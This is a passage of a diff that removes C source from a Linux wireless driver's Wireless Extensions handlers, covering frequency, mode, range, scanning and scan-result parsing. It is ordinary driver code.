strcpy(cap, "abg"); -- else -- strcpy(cap, "bg"); -- break; -- case WLC_PHY_TYPE_N: -- if (band[0] >= 2) -- strcpy(cap, "abgn"); -- else -- strcpy(cap, "bgn"); -- break; -- } --done: -- snprintf(cwrq->name, IFNAMSIZ, "IEEE 802.11%s", cap); -- return 0; --} -- --static int --wl_iw_set_freq( -- struct net_device *dev, -- struct iw_request_info *info, -- struct iw_freq *fwrq, -- char *extra --) --{ -- int error, chan; -- uint sf = 0; -- -- WL_TRACE(("%s: SIOCSIWFREQ\n", dev->name)); -- -- /* Setting by channel number */ -- if (fwrq->e == 0 && fwrq->m < MAXCHANNEL) { -- chan = fwrq->m; -- } -- -- /* Setting by frequency */ -- else { -- /* Convert to MHz as best we can */ -- if (fwrq->e >= 6) { -- fwrq->e -= 6; -- while (fwrq->e--) -- fwrq->m *= 10; -- } else if (fwrq->e < 6) { -- while (fwrq->e++ < 6) -- fwrq->m /= 10; -- } -- /* handle 4.9GHz frequencies as Japan 4 GHz based channelization */ -- if (fwrq->m > 4000 && fwrq->m < 5000) -- sf = WF_CHAN_FACTOR_4_G; /* start factor for 4 GHz */ -- -- chan = wf_mhz2channel(fwrq->m, sf); -- } -- chan = htod32(chan); -- if ((error = dev_wlc_ioctl(dev, WLC_SET_CHANNEL, &chan, sizeof(chan)))) -- return error; -- -- /* -EINPROGRESS: Call commit handler */ -- return -EINPROGRESS; --} -- --static int --wl_iw_get_freq( -- struct net_device *dev, -- struct iw_request_info *info, -- struct iw_freq *fwrq, -- char *extra --) --{ -- channel_info_t ci; -- int error; -- -- WL_TRACE(("%s: SIOCGIWFREQ\n", dev->name)); -- -- if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(ci)))) -- return error; -- -- /* Return radio channel in channel form */ -- fwrq->m = dtoh32(ci.hw_channel); -- fwrq->e = dtoh32(0); -- return 0; --} -- --static int --wl_iw_set_mode( -- struct net_device *dev, -- struct iw_request_info *info, -- __u32 *uwrq, -- char *extra --) --{ -- int infra = 0, ap = 0, error = 0; -- -- WL_TRACE(("%s: SIOCSIWMODE\n", dev->name)); -- -- switch (*uwrq) { -- case IW_MODE_MASTER: -- infra = ap = 1; -- break; -- case 
IW_MODE_ADHOC: -- case IW_MODE_AUTO: -- break; -- case IW_MODE_INFRA: -- infra = 1; -- break; -- default: -- return -EINVAL; -- } -- infra = htod32(infra); -- ap = htod32(ap); -- -- if ((error = dev_wlc_ioctl(dev, WLC_SET_INFRA, &infra, sizeof(infra))) || -- (error = dev_wlc_ioctl(dev, WLC_SET_AP, &ap, sizeof(ap)))) -- return error; -- -- /* -EINPROGRESS: Call commit handler */ -- return -EINPROGRESS; --} -- --static int --wl_iw_get_mode( -- struct net_device *dev, -- struct iw_request_info *info, -- __u32 *uwrq, -- char *extra --) --{ -- int error, infra = 0, ap = 0; -- -- WL_TRACE(("%s: SIOCGIWMODE\n", dev->name)); -- -- if ((error = dev_wlc_ioctl(dev, WLC_GET_INFRA, &infra, sizeof(infra))) || -- (error = dev_wlc_ioctl(dev, WLC_GET_AP, &ap, sizeof(ap)))) -- return error; -- -- infra = dtoh32(infra); -- ap = dtoh32(ap); -- *uwrq = infra ? ap ? IW_MODE_MASTER : IW_MODE_INFRA : IW_MODE_ADHOC; -- -- return 0; --} -- --static int --wl_iw_get_range( -- struct net_device *dev, -- struct iw_request_info *info, -- struct iw_point *dwrq, -- char *extra --) --{ -- struct iw_range *range = (struct iw_range *) extra; -- static int channels[MAXCHANNEL+1]; -- wl_uint32_list_t *list = (wl_uint32_list_t *) channels; -- wl_rateset_t rateset; -- int error, i, k; -- uint sf, ch; -- -- int phytype; -- int bw_cap = 0, sgi_tx = 0, nmode = 0; -- channel_info_t ci; -- uint8 nrate_list2copy = 0; -- uint16 nrate_list[4][8] = { {13, 26, 39, 52, 78, 104, 117, 130}, -- {14, 29, 43, 58, 87, 116, 130, 144}, -- {27, 54, 81, 108, 162, 216, 243, 270}, -- {30, 60, 90, 120, 180, 240, 270, 300}}; -- int fbt_cap = 0; -- -- WL_TRACE(("%s: SIOCGIWRANGE\n", dev->name)); -- -- if (!extra) -- return -EINVAL; -- -- dwrq->length = sizeof(struct iw_range); -- memset(range, 0, sizeof(*range)); -- -- /* We don't use nwids */ -- range->min_nwid = range->max_nwid = 0; -- -- /* Set available channels/frequencies */ -- list->count = htod32(MAXCHANNEL); -- if ((error = dev_wlc_ioctl(dev, WLC_GET_VALID_CHANNELS, 
channels, sizeof(channels)))) -- return error; -- for (i = 0; i < dtoh32(list->count) && i < IW_MAX_FREQUENCIES; i++) { -- range->freq[i].i = dtoh32(list->element[i]); -- -- ch = dtoh32(list->element[i]); -- if (ch <= CH_MAX_2G_CHANNEL) -- sf = WF_CHAN_FACTOR_2_4_G; -- else -- sf = WF_CHAN_FACTOR_5_G; -- -- range->freq[i].m = wf_channel2mhz(ch, sf); -- range->freq[i].e = 6; -- } -- range->num_frequency = range->num_channels = i; -- -- /* Link quality (use NDIS cutoffs) */ -- range->max_qual.qual = 5; -- /* Signal level (use RSSI) */ -- range->max_qual.level = 0x100 - 200; /* -200 dBm */ -- /* Noise level (use noise) */ -- range->max_qual.noise = 0x100 - 200; /* -200 dBm */ -- /* Signal level threshold range (?) */ -- range->sensitivity = 65535; -- --#if WIRELESS_EXT > 11 -- /* Link quality (use NDIS cutoffs) */ -- range->avg_qual.qual = 3; -- /* Signal level (use RSSI) */ -- range->avg_qual.level = 0x100 + WL_IW_RSSI_GOOD; -- /* Noise level (use noise) */ -- range->avg_qual.noise = 0x100 - 75; /* -75 dBm */ --#endif /* WIRELESS_EXT > 11 */ -- -- /* Set available bitrates */ -- if ((error = dev_wlc_ioctl(dev, WLC_GET_CURR_RATESET, &rateset, sizeof(rateset)))) -- return error; -- rateset.count = dtoh32(rateset.count); -- range->num_bitrates = rateset.count; -- for (i = 0; i < rateset.count && i < IW_MAX_BITRATES; i++) -- range->bitrate[i] = (rateset.rates[i] & 0x7f) * 500000; /* convert to bps */ -- if ((error = dev_wlc_intvar_get(dev, "nmode", &nmode))) -- return error; -- if ((error = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &phytype, sizeof(phytype)))) -- return error; -- if (nmode == 1 && ((phytype == WLC_PHY_TYPE_SSN) || (phytype == WLC_PHY_TYPE_LCN) || -- (phytype == WLC_PHY_TYPE_LCN40))) { -- if ((error = dev_wlc_intvar_get(dev, "mimo_bw_cap", &bw_cap))) -- return error; -- if ((error = dev_wlc_intvar_get(dev, "sgi_tx", &sgi_tx))) -- return error; -- if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(channel_info_t)))) -- return error; -- ci.hw_channel = 
dtoh32(ci.hw_channel);
--
-- if (bw_cap == 0 ||
-- (bw_cap == 2 && ci.hw_channel <= 14)) {
-- if (sgi_tx == 0)
-- nrate_list2copy = 0;
-- else
-- nrate_list2copy = 1;
-- }
-- if (bw_cap == 1 ||
-- (bw_cap == 2 && ci.hw_channel >= 36)) {
-- if (sgi_tx == 0)
-- nrate_list2copy = 2;
-- else
-- nrate_list2copy = 3;
-- }
-- range->num_bitrates += 8;
-- DHD_WARN(range->num_bitrates < IW_MAX_BITRATES, return BCME_ERROR;);
-- for (k = 0; i < range->num_bitrates; k++, i++) {
-- /* convert to bps */
-- range->bitrate[i] = (nrate_list[nrate_list2copy][k]) * 500000;
-- }
-- }
--
-- /* Set an indication of the max TCP throughput
-- * in bit/s that we can expect using this interface.
-- * May be use for QoS stuff... Jean II
-- */
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &i, sizeof(i))))
-- return error;
-- i = dtoh32(i);
-- if (i == WLC_PHY_TYPE_A)
-- range->throughput = 24000000; /* 24 Mbits/s */
-- else
-- range->throughput = 1500000; /* 1.5 Mbits/s */
--
-- /* RTS and fragmentation thresholds */
-- range->min_rts = 0;
-- range->max_rts = 2347;
-- range->min_frag = 256;
-- range->max_frag = 2346;
--
-- range->max_encoding_tokens = DOT11_MAX_DEFAULT_KEYS;
-- range->num_encoding_sizes = 4;
-- range->encoding_size[0] = WEP1_KEY_SIZE;
-- range->encoding_size[1] = WEP128_KEY_SIZE;
--#if WIRELESS_EXT > 17
-- range->encoding_size[2] = TKIP_KEY_SIZE;
--#else
-- range->encoding_size[2] = 0;
--#endif
-- range->encoding_size[3] = AES_KEY_SIZE;
--
-- /* Do not support power micro-management */
-- range->min_pmp = 0;
-- range->max_pmp = 0;
-- range->min_pmt = 0;
-- range->max_pmt = 0;
-- range->pmp_flags = 0;
-- range->pm_capa = 0;
--
-- /* Transmit Power - values are in mW */
-- range->num_txpower = 2;
-- range->txpower[0] = 1;
-- range->txpower[1] = 255;
-- range->txpower_capa = IW_TXPOW_MWATT;
--
--#if WIRELESS_EXT > 10
-- range->we_version_compiled = WIRELESS_EXT;
-- range->we_version_source = 19;
--
-- /* Only support retry limits */
-- range->retry_capa = IW_RETRY_LIMIT; 
-- range->retry_flags = IW_RETRY_LIMIT;
-- range->r_time_flags = 0;
-- /* SRL and LRL limits */
-- range->min_retry = 1;
-- range->max_retry = 255;
-- /* Retry lifetime limits unsupported */
-- range->min_r_time = 0;
-- range->max_r_time = 0;
--#endif /* WIRELESS_EXT > 10 */
--
--#if WIRELESS_EXT > 17
-- range->enc_capa = IW_ENC_CAPA_WPA;
-- range->enc_capa |= IW_ENC_CAPA_CIPHER_TKIP;
-- range->enc_capa |= IW_ENC_CAPA_CIPHER_CCMP;
-- range->enc_capa |= IW_ENC_CAPA_WPA2;
--
-- /* Determine driver FBT capability. */
-- if (dev_wlc_intvar_get(dev, "fbt_cap", &fbt_cap) == 0) {
-- if (fbt_cap == WLC_FBT_CAP_DRV_4WAY_AND_REASSOC) {
-- /* Tell the host (e.g. wpa_supplicant) to let driver do the handshake */
-- range->enc_capa |= IW_ENC_CAPA_4WAY_HANDSHAKE;
-- }
-- }
--
--#ifdef BCMFW_ROAM_ENABLE_WEXT
-- /* Advertise firmware roam capability to the external supplicant */
-- range->enc_capa |= IW_ENC_CAPA_FW_ROAM_ENABLE;
--#endif /* BCMFW_ROAM_ENABLE_WEXT */
--
-- /* Event capability (kernel) */
-- IW_EVENT_CAPA_SET_KERNEL(range->event_capa);
-- /* Event capability (driver) */
-- IW_EVENT_CAPA_SET(range->event_capa, SIOCGIWAP);
-- IW_EVENT_CAPA_SET(range->event_capa, SIOCGIWSCAN);
-- IW_EVENT_CAPA_SET(range->event_capa, IWEVTXDROP);
-- IW_EVENT_CAPA_SET(range->event_capa, IWEVMICHAELMICFAILURE);
-- IW_EVENT_CAPA_SET(range->event_capa, IWEVASSOCREQIE);
-- IW_EVENT_CAPA_SET(range->event_capa, IWEVASSOCRESPIE);
-- IW_EVENT_CAPA_SET(range->event_capa, IWEVPMKIDCAND);
--
--#if WIRELESS_EXT >= 22 && defined(IW_SCAN_CAPA_ESSID)
-- /* FC7 wireless.h defines EXT 22 but doesn't define scan_capa bits */
-- range->scan_capa = IW_SCAN_CAPA_ESSID;
--#endif
--#endif /* WIRELESS_EXT > 17 */
--
-- return 0;
--}
--
--static int
--rssi_to_qual(int rssi)
--{
-- if (rssi <= WL_IW_RSSI_NO_SIGNAL)
-- return 0;
-- else if (rssi <= WL_IW_RSSI_VERY_LOW)
-- return 1;
-- else if (rssi <= WL_IW_RSSI_LOW)
-- return 2;
-- else if (rssi <= WL_IW_RSSI_GOOD)
-- return 3;
-- else if (rssi <= 
WL_IW_RSSI_VERY_GOOD)
-- return 4;
-- else
-- return 5;
--}
--
--static int
--wl_iw_set_spy(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_iw_t *iw = IW_DEV_IF(dev);
-- struct sockaddr *addr = (struct sockaddr *) extra;
-- int i;
--
-- WL_TRACE(("%s: SIOCSIWSPY\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- iw->spy_num = MIN(ARRAYSIZE(iw->spy_addr), dwrq->length);
-- for (i = 0; i < iw->spy_num; i++)
-- memcpy(&iw->spy_addr[i], addr[i].sa_data, ETHER_ADDR_LEN);
-- memset(iw->spy_qual, 0, sizeof(iw->spy_qual));
--
-- return 0;
--}
--
--static int
--wl_iw_get_spy(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_iw_t *iw = IW_DEV_IF(dev);
-- struct sockaddr *addr = (struct sockaddr *) extra;
-- struct iw_quality *qual = (struct iw_quality *) &addr[iw->spy_num];
-- int i;
--
-- WL_TRACE(("%s: SIOCGIWSPY\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- dwrq->length = iw->spy_num;
-- for (i = 0; i < iw->spy_num; i++) {
-- memcpy(addr[i].sa_data, &iw->spy_addr[i], ETHER_ADDR_LEN);
-- addr[i].sa_family = AF_UNIX;
-- memcpy(&qual[i], &iw->spy_qual[i], sizeof(struct iw_quality));
-- iw->spy_qual[i].updated = 0;
-- }
--
-- return 0;
--}
--
--static int
--wl_iw_set_wap(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct sockaddr *awrq,
-- char *extra
--)
--{
-- int error = -EINVAL;
--
-- WL_TRACE(("%s: SIOCSIWAP\n", dev->name));
--
-- if (awrq->sa_family != ARPHRD_ETHER) {
-- WL_ERROR(("%s: Invalid Header...sa_family\n", __FUNCTION__));
-- return -EINVAL;
-- }
--
-- /* Ignore "auto" or "off" */
-- if (ETHER_ISBCAST(awrq->sa_data) || ETHER_ISNULLADDR(awrq->sa_data)) {
-- scb_val_t scbval;
-- bzero(&scbval, sizeof(scb_val_t));
-- if ((error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t)))) {
-- WL_ERROR(("%s: WLC_DISASSOC failed (%d).\n", __FUNCTION__, error));
-- }
-- return 0;
-- }
-- 
/* WL_ASSOC(("Assoc to %s\n", bcm_ether_ntoa((struct ether_addr *)&(awrq->sa_data),
-- * eabuf)));
-- */
-- /* Reassociate to the specified AP */
-- if ((error = dev_wlc_ioctl(dev, WLC_REASSOC, awrq->sa_data, ETHER_ADDR_LEN))) {
-- WL_ERROR(("%s: WLC_REASSOC failed (%d).\n", __FUNCTION__, error));
-- return error;
-- }
--
-- return 0;
--}
--
--static int
--wl_iw_get_wap(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct sockaddr *awrq,
-- char *extra
--)
--{
-- WL_TRACE(("%s: SIOCGIWAP\n", dev->name));
--
-- awrq->sa_family = ARPHRD_ETHER;
-- memset(awrq->sa_data, 0, ETHER_ADDR_LEN);
--
-- /* Ignore error (may be down or disassociated) */
-- (void) dev_wlc_ioctl(dev, WLC_GET_BSSID, awrq->sa_data, ETHER_ADDR_LEN);
--
-- return 0;
--}
--
--#if WIRELESS_EXT > 17
--static int
--wl_iw_mlme(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct sockaddr *awrq,
-- char *extra
--)
--{
-- struct iw_mlme *mlme;
-- scb_val_t scbval;
-- int error = -EINVAL;
--
-- WL_TRACE(("%s: SIOCSIWMLME\n", dev->name));
--
-- mlme = (struct iw_mlme *)extra;
-- if (mlme == NULL) {
-- WL_ERROR(("Invalid ioctl data.\n"));
-- return error;
-- }
--
-- scbval.val = mlme->reason_code;
-- bcopy(&mlme->addr.sa_data, &scbval.ea, ETHER_ADDR_LEN);
--
-- if (mlme->cmd == IW_MLME_DISASSOC) {
-- scbval.val = htod32(scbval.val);
-- error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t));
-- }
-- else if (mlme->cmd == IW_MLME_DEAUTH) {
-- scbval.val = htod32(scbval.val);
-- error = dev_wlc_ioctl(dev, WLC_SCB_DEAUTHENTICATE_FOR_REASON, &scbval,
-- sizeof(scb_val_t));
-- }
-- else {
-- WL_ERROR(("%s: Invalid ioctl data.\n", __FUNCTION__));
-- return error;
-- }
--
-- return error;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static int
--wl_iw_get_aplist(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_scan_results_t *list;
-- struct sockaddr *addr = (struct sockaddr *) extra;
-- struct iw_quality 
qual[IW_MAX_AP];
-- wl_bss_info_t *bi = NULL;
-- int error, i;
-- uint buflen = dwrq->length;
--
-- WL_TRACE(("%s: SIOCGIWAPLIST\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- /* Get scan results (too large to put on the stack) */
-- list = kmalloc(buflen, GFP_KERNEL);
-- if (!list)
-- return -ENOMEM;
-- memset(list, 0, buflen);
-- list->buflen = htod32(buflen);
-- if ((error = dev_wlc_ioctl(dev, WLC_SCAN_RESULTS, list, buflen))) {
-- WL_ERROR(("%d: Scan results error %d\n", __LINE__, error));
-- kfree(list);
-- return error;
-- }
-- list->buflen = dtoh32(list->buflen);
-- list->version = dtoh32(list->version);
-- list->count = dtoh32(list->count);
-- DHD_WARN(list->version == WL_BSS_INFO_VERSION, kfree(list);return BCME_ERROR;);
--
-- for (i = 0, dwrq->length = 0; i < list->count && dwrq->length < IW_MAX_AP; i++) {
-- bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
-- DHD_WARN(((uintptr)bi + dtoh32(bi->length)) <= ((uintptr)list +
-- buflen), kfree(list);return BCME_ERROR;);
--
-- /* Infrastructure only */
-- if (!(dtoh16(bi->capability) & DOT11_CAP_ESS))
-- continue;
--
-- /* BSSID */
-- memcpy(addr[dwrq->length].sa_data, &bi->BSSID, ETHER_ADDR_LEN);
-- addr[dwrq->length].sa_family = ARPHRD_ETHER;
-- qual[dwrq->length].qual = rssi_to_qual(dtoh16(bi->RSSI));
-- qual[dwrq->length].level = 0x100 + dtoh16(bi->RSSI);
-- qual[dwrq->length].noise = 0x100 + bi->phy_noise;
--
-- /* Updated qual, level, and noise */
--#if WIRELESS_EXT > 18
-- qual[dwrq->length].updated = IW_QUAL_ALL_UPDATED | IW_QUAL_DBM;
--#else
-- qual[dwrq->length].updated = 7;
--#endif /* WIRELESS_EXT > 18 */
--
-- dwrq->length++;
-- }
--
-- kfree(list);
--
-- if (dwrq->length) {
-- memcpy(&addr[dwrq->length], qual, sizeof(struct iw_quality) * dwrq->length);
-- /* Provided qual */
-- dwrq->flags = 1;
-- }
--
-- return 0;
--}
--
--static int
--wl_iw_iscan_get_aplist(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char 
*extra
--)
--{
-- wl_scan_results_t *list;
-- iscan_buf_t * buf;
-- iscan_info_t *iscan = g_iscan;
--
-- struct sockaddr *addr = (struct sockaddr *) extra;
-- struct iw_quality qual[IW_MAX_AP];
-- wl_bss_info_t *bi = NULL;
-- int i;
--
-- WL_TRACE(("%s: SIOCGIWAPLIST\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- if ((!iscan) || (iscan->sysioc_pid < 0)) {
-- return wl_iw_get_aplist(dev, info, dwrq, extra);
-- }
--
-- buf = iscan->list_hdr;
-- /* Get scan results (too large to put on the stack) */
-- while (buf) {
-- list = &((wl_iscan_results_t*)buf->iscan_buf)->results;
-- DHD_WARN(list->version == WL_BSS_INFO_VERSION, return BCME_ERROR;);
--
-- bi = NULL;
-- for (i = 0, dwrq->length = 0; i < list->count && dwrq->length < IW_MAX_AP; i++) {
-- bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
-- DHD_WARN(((uintptr)bi + dtoh32(bi->length)) <= ((uintptr)list +
-- WLC_IW_ISCAN_MAXLEN), return BCME_ERROR;);
--
-- /* Infrastructure only */
-- if (!(dtoh16(bi->capability) & DOT11_CAP_ESS))
-- continue;
--
-- /* BSSID */
-- memcpy(addr[dwrq->length].sa_data, &bi->BSSID, ETHER_ADDR_LEN);
-- addr[dwrq->length].sa_family = ARPHRD_ETHER;
-- qual[dwrq->length].qual = rssi_to_qual(dtoh16(bi->RSSI));
-- qual[dwrq->length].level = 0x100 + dtoh16(bi->RSSI);
-- qual[dwrq->length].noise = 0x100 + bi->phy_noise;
--
-- /* Updated qual, level, and noise */
--#if WIRELESS_EXT > 18
-- qual[dwrq->length].updated = IW_QUAL_ALL_UPDATED | IW_QUAL_DBM;
--#else
-- qual[dwrq->length].updated = 7;
--#endif /* WIRELESS_EXT > 18 */
--
-- dwrq->length++;
-- }
-- buf = buf->next;
-- }
-- if (dwrq->length) {
-- memcpy(&addr[dwrq->length], qual, sizeof(struct iw_quality) * dwrq->length);
-- /* Provided qual */
-- dwrq->flags = 1;
-- }
--
-- return 0;
--}
--
--#if WIRELESS_EXT > 13
--static int
--wl_iw_set_scan(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- union iwreq_data *wrqu,
-- char *extra
--)
--{
-- wlc_ssid_t ssid;
--
-- WL_TRACE(("%s: 
SIOCSIWSCAN\n", dev->name));
--
-- /* default Broadcast scan */
-- memset(&ssid, 0, sizeof(ssid));
--
--#if WIRELESS_EXT > 17
-- /* check for given essid */
-- if (wrqu->data.length == sizeof(struct iw_scan_req)) {
-- if (wrqu->data.flags & IW_SCAN_THIS_ESSID) {
-- struct iw_scan_req *req = (struct iw_scan_req *)extra;
-- ssid.SSID_len = MIN(sizeof(ssid.SSID), req->essid_len);
-- memcpy(ssid.SSID, req->essid, ssid.SSID_len);
-- ssid.SSID_len = htod32(ssid.SSID_len);
-- }
-- }
--#endif
-- /* Ignore error (most likely scan in progress) */
-- (void) dev_wlc_ioctl(dev, WLC_SCAN, &ssid, sizeof(ssid));
--
-- return 0;
--}
--
--static int
--wl_iw_iscan_set_scan(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- union iwreq_data *wrqu,
-- char *extra
--)
--{
-- wlc_ssid_t ssid;
-- iscan_info_t *iscan = g_iscan;
--
-- WL_TRACE(("%s: SIOCSIWSCAN\n", dev->name));
--
-- /* use backup if our thread is not successful */
-- if ((!iscan) || (iscan->sysioc_pid < 0)) {
-- return wl_iw_set_scan(dev, info, wrqu, extra);
-- }
-- if (iscan->iscan_state == ISCAN_STATE_SCANING) {
-- return 0;
-- }
--
-- /* default Broadcast scan */
-- memset(&ssid, 0, sizeof(ssid));
--
--#if WIRELESS_EXT > 17
-- /* check for given essid */
-- if (wrqu->data.length == sizeof(struct iw_scan_req)) {
-- if (wrqu->data.flags & IW_SCAN_THIS_ESSID) {
-- struct iw_scan_req *req = (struct iw_scan_req *)extra;
-- ssid.SSID_len = MIN(sizeof(ssid.SSID), req->essid_len);
-- memcpy(ssid.SSID, req->essid, ssid.SSID_len);
-- ssid.SSID_len = htod32(ssid.SSID_len);
-- }
-- }
--#endif
--
-- iscan->list_cur = iscan->list_hdr;
-- iscan->iscan_state = ISCAN_STATE_SCANING;
--
--
-- wl_iw_set_event_mask(dev);
-- wl_iw_iscan(iscan, &ssid, WL_SCAN_ACTION_START);
--
-- iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms);
-- add_timer(&iscan->timer);
-- iscan->timer_on = 1;
--
-- return 0;
--}
--
--#if WIRELESS_EXT > 17
--static bool
--ie_is_wpa_ie(uint8 **wpaie, uint8 **tlvs, int *tlvs_len)
--{
--/* Is 
this body of this tlvs entry a WPA entry? If */
--/* not update the tlvs buffer pointer/length */
-- uint8 *ie = *wpaie;
--
-- /* If the contents match the WPA_OUI and type=1 */
-- if ((ie[1] >= 6) &&
-- !bcmp((const void *)&ie[2], (const void *)(WPA_OUI "\x01"), 4)) {
-- return TRUE;
-- }
--
-- /* point to the next ie */
-- ie += ie[1] + 2;
-- /* calculate the length of the rest of the buffer */
-- *tlvs_len -= (int)(ie - *tlvs);
-- /* update the pointer to the start of the buffer */
-- *tlvs = ie;
-- return FALSE;
--}
--
--static bool
--ie_is_wps_ie(uint8 **wpsie, uint8 **tlvs, int *tlvs_len)
--{
--/* Is this body of this tlvs entry a WPS entry? If */
--/* not update the tlvs buffer pointer/length */
-- uint8 *ie = *wpsie;
--
-- /* If the contents match the WPA_OUI and type=4 */
-- if ((ie[1] >= 4) &&
-- !bcmp((const void *)&ie[2], (const void *)(WPA_OUI "\x04"), 4)) {
-- return TRUE;
-- }
--
-- /* point to the next ie */
-- ie += ie[1] + 2;
-- /* calculate the length of the rest of the buffer */
-- *tlvs_len -= (int)(ie - *tlvs);
-- /* update the pointer to the start of the buffer */
-- *tlvs = ie;
-- return FALSE;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--
--static int
--wl_iw_handle_scanresults_ies(char **event_p, char *end,
-- struct iw_request_info *info, wl_bss_info_t *bi)
--{
--#if WIRELESS_EXT > 17
-- struct iw_event iwe;
-- char *event;
--
-- event = *event_p;
-- if (bi->ie_length) {
-- /* look for wpa/rsn ies in the ie list... 
*/
-- bcm_tlv_t *ie;
-- uint8 *ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
-- int ptr_len = bi->ie_length;
--
-- /* OSEN IE */
-- if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_VS_ID)) &&
-- ie->len > WFA_OUI_LEN + 1 &&
-- !bcmp((const void *)&ie->data[0], (const void *)WFA_OUI, WFA_OUI_LEN) &&
-- ie->data[WFA_OUI_LEN] == WFA_OUI_TYPE_OSEN) {
-- iwe.cmd = IWEVGENIE;
-- iwe.u.data.length = ie->len + 2;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
-- }
-- ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
-- if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_RSN_ID))) {
-- iwe.cmd = IWEVGENIE;
-- iwe.u.data.length = ie->len + 2;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
-- }
-- ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
-- if ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_MDIE_ID))) {
-- iwe.cmd = IWEVGENIE;
-- iwe.u.data.length = ie->len + 2;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
-- }
-- ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
--
-- while ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_WPA_ID))) {
-- /* look for WPS IE */
-- if (ie_is_wps_ie(((uint8 **)&ie), &ptr, &ptr_len)) {
-- iwe.cmd = IWEVGENIE;
-- iwe.u.data.length = ie->len + 2;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
-- break;
-- }
-- }
--
-- ptr = ((uint8 *)bi) + sizeof(wl_bss_info_t);
-- ptr_len = bi->ie_length;
-- while ((ie = bcm_parse_tlvs(ptr, ptr_len, DOT11_MNG_WPA_ID))) {
-- if (ie_is_wpa_ie(((uint8 **)&ie), &ptr, &ptr_len)) {
-- iwe.cmd = IWEVGENIE;
-- iwe.u.data.length = ie->len + 2;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)ie);
-- break;
-- }
-- }
--
-- *event_p = event;
-- }
--
--#endif /* WIRELESS_EXT > 17 */
-- return 0;
--}
--static int
--wl_iw_get_scan(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- channel_info_t ci;
-- wl_scan_results_t *list;
-- struct iw_event iwe;
-- wl_bss_info_t *bi = 
NULL;
-- int error, i, j;
-- char *event = extra, *end = extra + dwrq->length, *value;
-- uint buflen = dwrq->length;
--
-- WL_TRACE(("%s: SIOCGIWSCAN\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- /* Check for scan in progress */
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(ci))))
-- return error;
-- ci.scan_channel = dtoh32(ci.scan_channel);
-- if (ci.scan_channel)
-- return -EAGAIN;
--
-- /* Get scan results (too large to put on the stack) */
-- list = kmalloc(buflen, GFP_KERNEL);
-- if (!list)
-- return -ENOMEM;
-- memset(list, 0, buflen);
-- list->buflen = htod32(buflen);
-- if ((error = dev_wlc_ioctl(dev, WLC_SCAN_RESULTS, list, buflen))) {
-- kfree(list);
-- return error;
-- }
-- list->buflen = dtoh32(list->buflen);
-- list->version = dtoh32(list->version);
-- list->count = dtoh32(list->count);
--
-- for (i = 0; i < list->count && i < IW_MAX_AP; i++) {
-- bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--
-- /* First entry must be the BSSID */
-- iwe.cmd = SIOCGIWAP;
-- iwe.u.ap_addr.sa_family = ARPHRD_ETHER;
-- memcpy(iwe.u.ap_addr.sa_data, &bi->BSSID, ETHER_ADDR_LEN);
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_ADDR_LEN);
--
-- /* SSID */
-- iwe.u.data.length = dtoh32(bi->SSID_len);
-- iwe.cmd = SIOCGIWESSID;
-- iwe.u.data.flags = 1;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, bi->SSID);
--
-- /* Mode */
-- if (dtoh16(bi->capability) & (DOT11_CAP_ESS | DOT11_CAP_IBSS)) {
-- iwe.cmd = SIOCGIWMODE;
-- if (dtoh16(bi->capability) & DOT11_CAP_ESS)
-- iwe.u.mode = IW_MODE_INFRA;
-- else
-- iwe.u.mode = IW_MODE_ADHOC;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_UINT_LEN);
-- }
--
-- /* Channel */
-- iwe.cmd = SIOCGIWFREQ;
--
-- iwe.u.freq.m = wf_channel2mhz(CHSPEC_CHANNEL(bi->chanspec),
